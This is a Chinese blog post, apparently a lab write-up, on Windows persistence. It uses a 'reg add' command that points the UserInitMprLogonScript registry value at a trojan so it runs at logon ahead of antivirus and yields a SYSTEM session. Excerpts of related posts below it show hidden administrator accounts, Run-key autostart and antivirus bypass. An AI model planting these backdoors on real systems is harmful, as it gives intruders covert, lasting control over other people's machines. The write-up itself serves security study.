Logon script后门权限维持

最新推荐文章于 2024-07-14 22:05:39 发布
最新推荐文章于 2024-07-14 22:05:39 发布
阅读量157 收藏 1
点赞数 3
文章标签: 服务器 linux 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64787896/article/details/137014723
版权
本文介绍了如何在Windows2008系统中通过修改注册表实现登录脚本后门,使木马在用户登录时自动执行,同时避开杀毒软件的防护,最终成功上线Viper并获得system权限。
摘要由CSDN通过智能技术生成

实验设备:Win2008

实验要求:在2008用户登陆时,修改注册表,触发logon,执行木马,上线Viper

Logon script后门

Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截

1.在Win2008上cmd输入reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\1704423740.exe"  ,添加注册表,开机即执行木马

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\1704423740.exe"

2.注销,再次上线

3.Viper成功上线,权限为system

eternality269
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Logon Script Manager-开源
05-03
LSM替代了您的Windows自定义登录脚本。 您可以配置不同的对象并将其添加到配置文件。 在客户端运行的是一个执行配置文件的代理。 没有更多脚本可以执行简单的任务!
Yet Another LogonScript-开源
05-03
另一个LogonScript(YaLS)是完全可换肤的,可以添加语言模块,并使用Active Directory组,用户,计算机甚至OU的Active Directory描述字段来了解在登录期间必须执行哪些驱动器/打印机或脚本。
Logon Scripts的后门实现思路
weixin_34082854的博客
09-12 1004
本文讲的是Logon Scripts的后门实现思路,依旧是对后门利用方法做介绍,本次介绍的是使用Logon Scripts的方法。然而我在研究过程中发现了一个特别的用法,脚本优先于杀毒软件执行,能够绕过杀毒软件对敏感操作的拦截,本文将要具体介绍这个技巧。 0x01 简介 · Logon Scripts用法 · 绕过360对wmi调用的拦截 · 特别用...
修改注册表键值UserInitMprLogonScript达到权限维持
热门推荐
Shanfenglan's blog
11-11 10万+
CATALOG前言实现 前言 注册表HKCR\Environment\UserInitMprLogonScript键值所指的程序会在杀毒软件启动前启动,而且修改它不需要管理员权限,因此我们可以通过其来达到权限维持的效果。 实现 bat文件内容为regsvr32 calc.dll,直接执行发现被360拦截。 这时候我们通过修改注册表的方式来绕过这个拦截让其在360启动前执行。 在powershell中输入,注意修改路径: New-ItemProperty "HKCU:\Environment\" UserI
Windows下常见的权限维持方法
Sulli的博客
12-02 1439
0x01 注册表自启动 可以通过修改注册表自启动的键值,添加一个木马程序路径,实现开机自启动 常见的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run # Wi...
windows权限维持的方法
小小猪的博客
01-04 5909
windows权限维持的方法 影子账户: 使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏 打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM),修改SAM权限,赋予adminitrators完全控制权限 重启之后,将Administr.
Windows权限维持
Williamanddog的博客
02-10 410
logon scripts后门 Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,从而绕过杀毒软件对敏感操作的拦截。 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO 的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将exe文件注册为服务,也可以 将dll文件注册为服务。
Kixed Logon Script:Kixtart中Windows服务器环境的登录脚本-开源
05-08
我喜欢gpo,但是我需要个性化终端服务器中用户的环境。 因此,我创建了一个登录脚本来满足我的需求。 它之所以用kix编写,只是因为我喜欢它:P并且编写起来非常快。 因此,完全有可能在vbs或wsh中对其进行调整。...
W10 BG Logon Changer
02-15
通常,用户直接操作这些核心组件可能会带来风险,如系统稳定性下降或权限问题。而W10 BG Logon Changer则为用户提供了安全、便捷的解决方案。 该软件的工作原理是找到Windows 10系统中存储登录背景图像的文件,并...
MVC网站开发之权限管理篇
10-21
【MVC网站开发之权限管理】在Web应用开发中,权限管理是不可或缺的一部分,它确保了用户只能访问他们被授权的资源,提升了系统的安全性。在MVC(Model-View-Controller)架构中,权限管理的设计更为重要,因为它涉及...
恶意代码常见驻留分析
weixin_43781139的博客
07-26 1995
前言 恶意代码的一个重要功能就是要实现内存常驻,只要常驻内存,恶意代码就可以一直执行恶意行为,不会因为电脑重新启动、切换用户等原因停止。前文介绍的启动、Hook、注入中的很多技术都可以实现内存常驻,除此之外,恶意代码还可以利用一些系统功能实现内存常驻。本文就与你娓娓道来。 辅助功能 辅助功能介绍 windows提供了一些辅助功能,比如放大镜、讲述人等。Windows的辅助功能又叫做“轻松使用”,你可以在控制面板中查看他们。 这些辅助功能可以在用户登录界面启动,当你在登录界面按下win+U,就会弹出辅助功能的
windows操作系统常见持久性后门
weixin_42282189的博客
10-14 2545
windows操作系统常见持久性后门 0x00 简介 ​ 当我们拿到域中最高权限之后,就需要将自己的权限进行巩固,进行权限持久化操作。 0x01 隐藏账户 1.1 测试系统 win 7 1.2 新建特殊账户 在目标主机cmd中输入以下命令,创建一个名为whoami$的隐藏账户,并把该隐藏账户设置为管理员权限 net user whoami$ howe7 /add net localgroup administrators whoami$ /add ​ 注:创建的用户名必须以$符
注册表五大键及安全
tryheart的博客
06-16 4970
注册表五大键 一、注册表的由来 PC机及其操作系统的一个特点就是允许用户按照自己的要求对计算机系统的硬件和软件进行各种各样的配置。早期的图形操作系统,如Win3.x中,对软硬件工作环境的配置是通过对扩展名为.ini的文件进行修改来完成的,但INI文件管理起来很不方便,因为每种设备或应用程序都得有自己的INI文件,并且在网络上难以实现远程访问。 为了克服上述这些问题,在Windows 95及其后继版本中,采用了一种叫做“注册表”的数据库来统一进行管理,将各种信息资源集中起来并存储各种配置信息。按照这一原则,W
常见的几种Windows后门持久化方式
qq284489030的博客
05-09 2017
0×0 背景 持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用。 0×1 注册表自启动 最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动,此类操作一些较为敏感容易被本地AV...
windows中常见后门持久化方法总结
收集盒 Book box
11-13 1670
前言 当我们通过各种方法拿到一个服务器权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法 后门持久化 我的操作环境是: 无AV、管理员权限(提权、免杀等是后门持久化的铺垫,当然有的方法也并不是全部需要这些铺垫) 操作系统:win7,windows server 2008R2,xp shift后门...
Linux 命令 —— top命令(查看进程资源占用)
longool的博客
07-14 661
top 命令是 Linux/Unix 系统中常用的进程监控工具,可以实时显示系统中各个进程的资源占用情况,是一个快照信息,包括CPU、内存等。进入 linux 系统,直接输入 top,回车,就会显示如下所示的信息。1、第一行:时间上的统计top - 15:10:50:表示当前系统的时间是15:10:50;up 10 min:表示系统当前已经运行了10分钟。user:表示当前登录系统的用户数为1。
数据库管理-第218期 服务器内存(20240711)
yhw1809的博客
07-11 841
本期简单介绍了ECC内存是如何实现校验纠错的。
Linux】:文件fd
Yikefore的博客
07-14 580
文件fd的详细解析!
阿里云搭建vps服务器的过程
最新发布
zhanchulan的博客
07-14 378
最近突发奇想想要搭建一个阿里云的的vps服务器,下面是搭建的过程: 首先,登录阿里云网站: 搜索,esc控制台: 点击创建实例: 选择地区: 选择实例规格: 选择镜像: 将存储规格改成100G(40G可能不够用) 点击下一步: 这里面不需要更改,点击下一步 设置连接密码即可 创建成功后点击启动 点击远程连接,然后立即登录,在弹出的框里面输入之前设置的密码即可 登录成功:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值